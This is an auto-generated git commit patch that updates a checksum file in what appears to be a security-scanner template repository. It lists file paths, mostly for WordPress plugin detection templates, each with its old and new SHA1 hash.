-http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml -ssl/c2/mythic-c2-ssl.yaml -workflows/kev-workflow.yaml From 4f11784ab983a6dd172a0893787e6d56ef0762c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 05:34:36 +0000 Subject: [PATCH 0292/1090] Auto Generated Templates Checksum [Tue Sep 12 05:34:36 UTC 2023] :robot: --- templates-checksum.txt | 428 ++++++++++++++++++++--------------------- 1 file changed, 214 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e5f3bcb5d7..97c97db537 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:199144f48ac09cb3cd2fd31555bd3ab2f87e4168 +README.md:dd1fa7e282ecfc701893c864747b2cb4fc8ef3bc README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 -TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 -TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b +TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d +TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f +TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 cves.json:50ad24f7101b7875bd72ee8c22d5310b2e1a8ed5 cves.json-checksum.txt:f8967aefd08c72c7ae46c998df61cc4f4f8a494e @@ -404,7 +404,7 @@ helpers/wordpress/plugins/custom-fonts.txt:d1325bb186bd83303245e504f7c6eceae7f19 helpers/wordpress/plugins/custom-post-type-ui.txt:6f8ae49c8330db0117068d4ee1b0515e49b98212 helpers/wordpress/plugins/disable-comments.txt:885717c949656aacb397735714a117bba20af139 helpers/wordpress/plugins/disable-gutenberg.txt:bdc1408a91f161dab5a9893d23db3c7095200e1d -helpers/wordpress/plugins/duplicate-page.txt:69a192666c004f35303d55baa6cc828eb977144f +helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/duplicator.txt:098abf50b35f199f6665ef82fc20ed1ed860018a helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c @@ -432,14 +432,14 @@ helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31 helpers/wordpress/plugins/google-listings-and-ads.txt:89941265e418c7729912b574c9b29eff77c5b172 -helpers/wordpress/plugins/google-site-kit.txt:2d61b8dd1d2334f5ff6b9c2010bf4078470db01d +helpers/wordpress/plugins/google-site-kit.txt:1ea542c4af360053318955743814486207238bc6 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/gutenberg.txt:b987da06f27582a0a441e2568c45f3e3f9f47618 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444 -helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279959b616f8ddd5a +helpers/wordpress/plugins/header-footer-elementor.txt:bce6b7cb2b4348e7bc107654aaedf6662b338f4c helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 @@ -452,7 +452,7 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa86 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/jetpack-boost.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c -helpers/wordpress/plugins/kadence-blocks.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 +helpers/wordpress/plugins/kadence-blocks.txt:76352622a937abb841a04340015012a42290add0 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8 @@ -466,8 +466,8 @@ helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937c helpers/wordpress/plugins/mailpoet.txt:e779613ff1acc7ee99576cbf9159c456876a34b2 helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab -helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 -helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 +helpers/wordpress/plugins/malcare-security.txt:24e26a42407173a638a100c03fae8fc56d72c5e3 +helpers/wordpress/plugins/megamenu.txt:157d4751f6fc258dd2244da6c46a957ae64e4258 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0 @@ -562,14 +562,14 @@ helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795c helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c -helpers/wordpress/plugins/wp-statistics.txt:ac32f8a4347b3f038cc4bd52d7ecaa8cd4774179 +helpers/wordpress/plugins/wp-statistics.txt:3bf7ffbc26b9cc11db0363f3cac17c05f5b47aff helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e helpers/wordpress/plugins/wp-user-avatar.txt:88c9e71b6f0f80feda9e73aae625459cce73b1b8 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60f35 helpers/wordpress/plugins/wps-hide-login.txt:79eec5c95867be248c5b70dc82c95d33a9b7ef10 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:d8533834eb565a6b5b4d3c088f217a5413e027fa +helpers/wordpress/plugins/wpvivid-backuprestore.txt:61e0e2ed7647753ca89ac40eac19b4f93c5aad71 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:8fb4537f45c70359a62b29c044ee196cd3454f82 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c @@ -3909,7 +3909,7 @@ http/exposures/files/desktop-ini-exposure.yaml:bd4a7906c29f30db2af50eeafcff90e48 http/exposures/files/django-secret-key.yaml:7ff17ec8bf40acb56e1c2aba730704b0b5e09abd http/exposures/files/docker-cloud.yaml:620e2b3d470a0bd13e02718bc3568020b299da52 http/exposures/files/domcfg-page.yaml:df21e11c5d8871c6775284236b63b1def74bd167 -http/exposures/files/drupal-install.yaml:aca2b7201bea93c86221770367b9ff0ad9d1bb8e +http/exposures/files/drupal-install.yaml:bbd7034c8eae972d68c49c229b0cf752f9a85fb0 http/exposures/files/ds-store-file.yaml:95cbe8cc82526fa0af82b04b79d1e0dd62f1f0e7 http/exposures/files/dwsync-exposure.yaml:0d5079c93602e8f93ebb56a0a847ea263cb590c8 http/exposures/files/environment-rb.yaml:333ae687e26c3a64b96dee8d97faeb7215e1ca4a @@ -5814,218 +5814,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb 